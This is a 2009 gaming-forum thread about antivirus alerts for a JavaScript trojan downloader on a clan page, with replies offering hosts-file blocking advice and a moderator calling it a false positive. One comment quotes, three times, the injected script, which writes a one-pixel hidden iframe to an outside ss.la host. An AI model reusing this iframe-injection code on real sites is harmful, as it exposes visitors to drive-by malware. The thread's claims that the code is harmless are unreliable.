Kaspersky detected Trojan downloader on website.
Might be a false-positive, but when i clicked on the link to the clan page, kaspersky alerted me of a trojan downloader.
9/15/2009 5:46:10 PM http://8889.ss.la/ avast! Web Scanner Detected: Trojan-Downloader.JS.Iframe.brr
9/15/2009 5:46:10 PM http://8889.ss.la/ avast! Web Scanner Denied: Trojan-Downloader.JS.Iframe.brr
9/15/2009 5:47:01 PM http://8889.ss.la/ avast! Web Scanner Detected: Trojan-Downloader.JS.Iframe.brr
9/15/2009 5:47:01 PM http://8889.ss.la/ avast! Web Scanner Denied: Trojan-Downloader.JS.Iframe.brr
2 have been denied, and 2 have been detected. Should i be worried because i know someone else who got this as well with AVG anti-virus. :O
Simple virus scan should do the trick right?
9/15/2009 5:46:10 PM http://8889.ss.la/ avast! Web Scanner Detected: Trojan-Downloader.JS.Iframe.brr
9/15/2009 5:46:10 PM http://8889.ss.la/ avast! Web Scanner Denied: Trojan-Downloader.JS.Iframe.brr
9/15/2009 5:47:01 PM http://8889.ss.la/ avast! Web Scanner Detected: Trojan-Downloader.JS.Iframe.brr
9/15/2009 5:47:01 PM http://8889.ss.la/ avast! Web Scanner Denied: Trojan-Downloader.JS.Iframe.brr
2 have been denied, and 2 have been detected. Should i be worried because i know someone else who got this as well with AVG anti-virus. :O
Simple virus scan should do the trick right? Comments
-
-
Nod32 picks up nothing, nor have I seen any open connections to that address. The code it points to doesn't even look malicious:
var s,siteUrl,tmpdomain; var arydomain = new Array(".gov.cn",".e1du.cn",".dl108.com"); s = document.location+""; siteUrl=s.substring(7,s.indexOf('/',7)); tmpdomain = 0; for(var i=0;i<arydomain.length; i++) { if(siteUrl.indexOf(arydomain[i]) > -1){ tmpdomain = 1; break; } } if(tmpdomain == 0){ document.writeln("<iframe src=http://ha2.ss.la/1/google.htm?1 width=123 height=1></iframe>"); }
The IP of the site, however, resolved to China. -
Nod32 picks up nothing, nor have I seen any open connections to that address. The code it points to doesn't even look malicious:
var s,siteUrl,tmpdomain; var arydomain = new Array(".gov.cn",".e1du.cn",".dl108.com"); s = document.location+""; siteUrl=s.substring(7,s.indexOf('/',7)); tmpdomain = 0; for(var i=0;i<arydomain.length; i++) { if(siteUrl.indexOf(arydomain[i]) > -1){ tmpdomain = 1; break; } } if(tmpdomain == 0){ document.writeln("<iframe src=http://ha2.ss.la/1/google.htm?1 width=123 height=1></iframe>"); }
The IP of the site, however, resolved to China.
do i smell phishing? -
Nod32 picks up nothing, nor have I seen any open connections to that address. The code it points to doesn't even look malicious:
var s,siteUrl,tmpdomain; var arydomain = new Array(".gov.cn",".e1du.cn",".dl108.com"); s = document.location+""; siteUrl=s.substring(7,s.indexOf('/',7)); tmpdomain = 0; for(var i=0;i<arydomain.length; i++) { if(siteUrl.indexOf(arydomain[i]) > -1){ tmpdomain = 1; break; } } if(tmpdomain == 0){ document.writeln("<iframe src=http://ha2.ss.la/1/google.htm?1 width=123 height=1></iframe>"); }The IP of the site, however, resolved to China.
Omg the chinese are coming for me.
So pretty much, this is harmless?
However, will a scan be enough to double check or is there some more things i can do? bah.
EDIT: Kaspersky picked up another one of these Trojan downloaders when i refreshed forums.
I think making fun of 9esu and T3 ticked China off. O_O
EDIT 2: To Greycloak, when i try to visit http://8889.ss.la/, kaspersky blocks the site because it says it is infected. OMG OMG OMG. -
It definitely looks like it's spyware of some site, not necessarily a trojan. If you want to block contact to the site, go to C:\windows\system32\drivers\etc and open the filed called 'hosts'. You will have to tell Windows to open it with notepad. Once it opens, on a new line put:
127.0.0.1 8889.ss.la
What that will do is anytime your browser makes a request for that page, it redirects it to your own computer. This effectively keeps that site from ever loading. On vista systems you may need to open notepad with admin privileges to edit the hosts file.
Again, I was able to browse directly to the site without Nod32 raising any flags. I also haven't noticed any unwanted net traffic. -
Hm, i just finished scanning with Kaspersky and it didnt detect anything.
Just to make sure, i recently changed my password.
Prior to getting the detection, i remember something was odd about the site. There was no clan and forum link, but instead they were grouped together under (if i remember correctly) "Media".
So they were like sub-links such as the Downloads where u get Game download, screenshots, etc.
When i refreshed, the website went back to normal. Any thoughts? -
Thanks for the info on this guys.
It is a false positive, at least on anything coming from our end. I can't speak to a potential spyware/malware/infection on any persons particular computer.
Best bet is to keep track, scan the system and and check back.
I'll check into our site to make sure that whatever may be causing this gets taken care of.
edit: also gonna move this to the tech forums. -
![[Greycloak]](https://z8games.akamaized.net/cfna/forum/customavatars/48/navatar_3014548.gif){kind=avatar}
![[LobsterMts]](https://forum.z8games.com/uploads/customavatars/57/navatar_5413357.gif){kind=avatar}
![[MOD]Zzxq](https://z8games.akamaized.net/cfna/forum/customavatars/20/navatar_5345120.gif){kind=avatar}
Categories
- All Categories
- Z8Games
- 1 Z8 Forum Discussion & Suggestions
- 15 Z8Games Announcements
- Rules & Conduct
- 2.5K CrossFire
- 715 CrossFire Announcements
- 714 Previous Announcements
- 2 Previous Patch Notes
- 321 Community
- 12 Modes
- 393 Suggestions
- 16 Clan Discussion and Recruitment
- 73 CF Competitive Forum
- 1 CFCL
- 16 Looking for a Team?
- 524 CrossFire Support
- 7 Suggestion
- 15 CrossFire Guides
- 37 CrossFire Off Topic